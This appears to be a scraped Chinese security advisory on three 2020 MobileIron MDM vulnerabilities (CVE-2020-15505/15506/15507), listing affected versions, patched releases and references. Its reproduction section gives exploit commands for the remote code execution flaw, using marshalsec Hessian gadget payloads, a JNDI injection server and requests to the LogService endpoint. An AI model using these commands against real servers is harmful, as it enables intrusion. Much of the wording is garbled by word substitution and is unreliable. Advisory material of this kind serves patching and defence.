GA黄金甲

首页 > 安全钻研 > 安全传递 > 安全公告

MobileIron | 11月MDM多个安全缝隙公告

颁布功夫 2020-11-26

0x00 缝隙概述

产品名称	CVE ID	类型	缝隙等级	远程利用
MobileIron Core & Connector、Sentry、Monitor and Reporting Database (RDB)	CVE-2020-15505	RCE	严沉	是
MobileIron Core＆Connector	CVE-2020-15506	身份验证绕过	严沉	是
MobileIron Core	CVE-2020-15507	肆意文件读取	高危	是

0x01 缝隙详情

MobileIron是全球当先且发展最迅快的移动IT解决规划厂商之一，在全球有近20000家公司使用MobileIron的移动设备治理解决规划（MDM）。

2020年10月22日，MobileIron颁布更新布告，MDM中存在的多个安全缝隙（CVE-2020-15505、CVE-2020-15506和CVE-2020-15507）已在6月15日颁布的补丁中被建复。缝隙详情如下：

MobileIron远程代码执行缝隙（CVE-2020-15505）

该缝隙是MobileIron移动设备治理（MDM）中的一个远程代码执行缝隙，其CVSS评分9.8。攻击者能够利用此缝隙执行肆意代码并节造公司的服务器。

该缝隙的PoC已于9月在Github上被颁布。近日，该缝隙在被APT组织和网络犯罪组织积极尝试利用。

缝隙复现：

Groovy反序列化幼工具

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian Groovy "/bin/bash" "-c" "" > exp.ser

python hessian.py -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService' -p exp.ser

本地JNDI注入

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C ""

java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://:1099/> exp

python hessian.py -p exp -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService'

影响领域：

MobileIron Core＆Connector：10.3.0.3及之前版本、10.4.0.0、10.4.0.1、10.4.0.2、10.4.0.3、10.5.1.0、10.5.2.0、10.6.0.0

Sentry：9.7.2及之前版本、9.8.0

Monitor and Reporting Database (RDB)：2.0.0.1及之前版本

MobileIron身份验证绕过缝隙（CVE-2020-15506）

该缝隙是MobileIron移动设备治理（MDM）中的一个身份验证绕过缝隙，其CVSS评分9.8。攻击者可利用此缝隙绕过身份验证机造。

影响领域：

MobileIron Core＆Connector：

10.3.0.3及之前版本

10.4.0.0、10.4.0.1、10.4.0.2、10.4.0.3

10.5.1.0、10.5.2.0

10.6.0.0

MobileIron肆意文件读取缝隙（CVE-2020-15507）

该缝隙是MobileIron移动设备治理（MDM）中的一个肆意文件读取缝隙，其CVSS评分7.5。攻击者可利用此缝隙读取文件系统中的敏感信息。

影响领域：

MobileIron Core：

10.3.0.3及之前版本

10.4.0.0、10.4.0.1、10.4.0.2、10.4.0.3

10.5.1.0、10.5.2.0

10.6.0.0

0x02 措置建议

目前MobileIron已经颁布了有关更新，建议参升级至如下版本。

MobileIron Core & Enterprise Connector：

v10.3.0.4、v10.4.0.4、v10.5.1.1、v10.5.2.1、v10.6.0.或更高版本。

MobileIron Sentry：

v9.7.3、v9.8.1或更高版本。

MobileIron Monitor and Reporting Database (RDB)：

v2.0.0.2或更高版本。

补丁链接：

https://help.mobileiron.com/s/article-detail-page?Id=kA12T000000g065SAA

0x03 参考链接

https://www.mobileiron.com/en/blog/mobileiron-security-updates-available

https://threatpost.com/critical-mobileiron-rce-flaw-attack/161600/

https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2020-15505

0x04 功夫线

2020-07-01 MobileIron颁布安全布告

2020-10-22 MobileIron更新安全布告

2020-11-26 VSRC颁布安全公告

0x05 附录

CVSS评分尺度官网：http://www.first.org/cvss/

上一篇下一篇

7*24幼时服务热线

400-624-3900

+86(10)56631988(港澳专线)

04152424g9z1

官方微信

12145445s033

官方微博

网御星云合多数据书生电子云子可信

司法申明

Copyright ? GA黄金甲版权所有京ICP备05032414号京公网安备11010802024551号

【网站地图】